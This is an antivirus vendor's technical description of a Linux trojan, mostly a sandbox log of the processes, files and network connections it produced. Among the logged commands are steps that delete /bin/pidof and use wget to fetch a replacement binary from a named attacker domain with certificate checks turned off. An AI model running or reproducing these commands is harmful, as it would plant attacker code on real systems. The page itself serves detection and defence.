Defend what you create

Other Resources

Close

Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.MulDrop.49

Added to the Dr.Web virus database: 2020-02-20

Virus description added:

Technical Information

Malicious functions:
Launches processes:
  • /bin/bash <SAMPLE_FULL_PATH> -c exec '<SAMPLE_FULL_PATH>' \"$@\" <SAMPLE_FULL_PATH>
  • <SAMPLE_FULL_PATH>
  • /bin/bash <SAMPLE_FULL_PATH> -c
  • mv /bin/pidof /bin/prednizons
  • rm -rf /bin/pidof
  • wget -q --no-check-certificate https://turascript.xyz/pidof
  • chmod 777 pidof
  • wget https://turascript.xyz/panel/turasc/scscript/info.txt -q -O -
  • wget https://turascript.xyz/panel/turasc/scscript/info2.txt -q -O -
  • id -u
  • clear
  • sleep 3
  • grep CentOS
  • grep ^NAME
  • cat /etc/os-release
  • grep Ubuntu
  • grep Debian
  • apt-get update -y
  • /usr/bin/dpkg --print-foreign-architectures
  • /usr/lib/apt/methods/http
  • update-ca-certificates
  • mktemp -t ca-certificates.crt.tmp.XXXXXX
  • mktemp -t ca-certificates.tmp.XXXXXX
  • sed -n -e /^$/d -e s/^!//p /etc/ca-certificates.conf
  • sed -e /^$/d -e /^#/d -e /^!/d /etc/ca-certificates.conf
  • basename /usr/share/ca-certificates/mozilla/ACCVRAIZ1.crt .crt
  • sed -e s/ /_/g -e s/[()]/=/g -e s
  • readlink /etc/ssl/certs/ACCVRAIZ1.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/ACCVRAIZ1.crt
  • basename /usr/share/ca-certificates/mozilla/ACEDICOM_Root.crt .crt
  • readlink /etc/ssl/certs/ACEDICOM_Root.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/ACEDICOM_Root.crt
  • basename /usr/share/ca-certificates/mozilla/Actalis_Authentication_Root_CA.crt .crt
  • readlink /etc/ssl/certs/Actalis_Authentication_Root_CA.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Actalis_Authentication_Root_CA.crt
  • basename /usr/share/ca-certificates/mozilla/AddTrust_External_Root.crt .crt
  • readlink /etc/ssl/certs/AddTrust_External_Root.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AddTrust_External_Root.crt
  • basename /usr/share/ca-certificates/mozilla/AddTrust_Low-Value_Services_Root.crt .crt
  • readlink /etc/ssl/certs/AddTrust_Low-Value_Services_Root.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AddTrust_Low-Value_Services_Root.crt
  • basename /usr/share/ca-certificates/mozilla/AddTrust_Public_Services_Root.crt .crt
  • readlink /etc/ssl/certs/AddTrust_Public_Services_Root.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AddTrust_Public_Services_Root.crt
  • basename /usr/share/ca-certificates/mozilla/AddTrust_Qualified_Certificates_Root.crt .crt
  • readlink /etc/ssl/certs/AddTrust_Qualified_Certificates_Root.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AddTrust_Qualified_Certificates_Root.crt
  • basename /usr/share/ca-certificates/mozilla/AffirmTrust_Commercial.crt .crt
  • readlink /etc/ssl/certs/AffirmTrust_Commercial.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AffirmTrust_Commercial.crt
  • basename /usr/share/ca-certificates/mozilla/AffirmTrust_Networking.crt .crt
  • readlink /etc/ssl/certs/AffirmTrust_Networking.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AffirmTrust_Networking.crt
  • basename /usr/share/ca-certificates/mozilla/AffirmTrust_Premium.crt .crt
  • readlink /etc/ssl/certs/AffirmTrust_Premium.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AffirmTrust_Premium.crt
  • basename /usr/share/ca-certificates/mozilla/AffirmTrust_Premium_ECC.crt .crt
  • readlink /etc/ssl/certs/AffirmTrust_Premium_ECC.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/AffirmTrust_Premium_ECC.crt
  • basename /usr/share/ca-certificates/mozilla/ApplicationCA_-_Japanese_Government.crt .crt
  • readlink /etc/ssl/certs/ApplicationCA_-_Japanese_Government.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/ApplicationCA_-_Japanese_Government.crt
  • basename /usr/share/ca-certificates/mozilla/Atos_TrustedRoot_2011.crt .crt
  • readlink /etc/ssl/certs/Atos_TrustedRoot_2011.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Atos_TrustedRoot_2011.crt
  • basename /usr/share/ca-certificates/mozilla/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.crt .crt
  • readlink /etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.crt
  • basename /usr/share/ca-certificates/mozilla/Baltimore_CyberTrust_Root.crt .crt
  • readlink /etc/ssl/certs/Baltimore_CyberTrust_Root.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Baltimore_CyberTrust_Root.crt
  • basename /usr/share/ca-certificates/mozilla/Buypass_Class_2_CA_1.crt .crt
  • readlink /etc/ssl/certs/Buypass_Class_2_CA_1.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Buypass_Class_2_CA_1.crt
  • basename /usr/share/ca-certificates/mozilla/Buypass_Class_2_Root_CA.crt .crt
  • readlink /etc/ssl/certs/Buypass_Class_2_Root_CA.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Buypass_Class_2_Root_CA.crt
  • basename /usr/share/ca-certificates/mozilla/Buypass_Class_3_Root_CA.crt .crt
  • readlink /etc/ssl/certs/Buypass_Class_3_Root_CA.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Buypass_Class_3_Root_CA.crt
  • basename /usr/share/ca-certificates/mozilla/CA_Disig.crt .crt
  • readlink /etc/ssl/certs/CA_Disig.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/CA_Disig.crt
  • basename /usr/share/ca-certificates/mozilla/CA_Disig_Root_R1.crt .crt
  • readlink /etc/ssl/certs/CA_Disig_Root_R1.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/CA_Disig_Root_R1.crt
  • basename /usr/share/ca-certificates/mozilla/CA_Disig_Root_R2.crt .crt
  • readlink /etc/ssl/certs/CA_Disig_Root_R2.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/CA_Disig_Root_R2.crt
  • basename /usr/share/ca-certificates/mozilla/Camerfirma_Chambers_of_Commerce_Root.crt .crt
  • readlink /etc/ssl/certs/Camerfirma_Chambers_of_Commerce_Root.pem
  • sed -e $a\ /usr/share/ca-certificates/mozilla/Camerfirma_Chambers_of_Commerce_Root.crt
Kills the following processes:
  • /usr/lib/apt/methods/http
Performs operations with the file system:
Creates or modifies files:
  • /bin/pidof
  • /var/lib/apt/lists/lock
  • /var/lib/apt/lists/security.debian.org_dists_jessie_updates_InRelease
  • /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
  • /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie-updates_InRelease
  • /var/lib/apt/lists/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
  • /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg.reverify
  • /var/lib/dpkg/lock
  • /tmp/ca-certificates.crt.tmp.cuPhx9
  • /tmp/ca-certificates.tmp.SkBRZZ
  • /tmp/ca-certificates.tmp.PMOkJ7
Deletes files:
  • /bin/pidof
  • /var/lib/apt/lists/partial/ftp.ru.debian.org_debian_dists_jessie_Release.gpg
  • /var/cache/apt/pkgcache.bin
  • /var/cache/apt/srcpkgcache.bin
Network activity:
Establishes connection:
  • <LOCAL_DNS_SERVER>
  • 18#.##9.26.181:443
  • 21#.##6.149.233:80
  • [2#######8:dc41:100::233]:80
  • [2#########:1:216:35ff:fe7f:6ceb]:80
HTTP GET requests:
  • se######.#####n.org/dists/jessie/updates/InRelease
  • ft#.##.######.org/debian/dists/jessie/InRelease
  • ft#.##.######.#rg/debian/dists/jessie-updates/InRelease
DNS ASK:
  • tu###cript.xyz
  • ft#.##.debian.org
  • se####ty.debian.org
Sends data to the following servers:
  • 18#.##9.26.181:443
Receives data from the following servers:
  • 18#.##9.26.181:443
Other:
Collects RAM information

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number

The Russian developer of Dr.Web anti-viruses

Doctor Web has been developing anti-virus software since 1992

Dr.Web is trusted by users around the world in 200+ countries

The company has delivered an anti-virus as a service since 2007

24/7 tech support

© Doctor Web
2003 — 2020

Doctor Web is the Russian developer of Dr.Web anti-virus software. Dr.Web anti-virus software has been developed since 1992.

2-12А, 3rd street Yamskogo polya, Moscow, Russia, 125040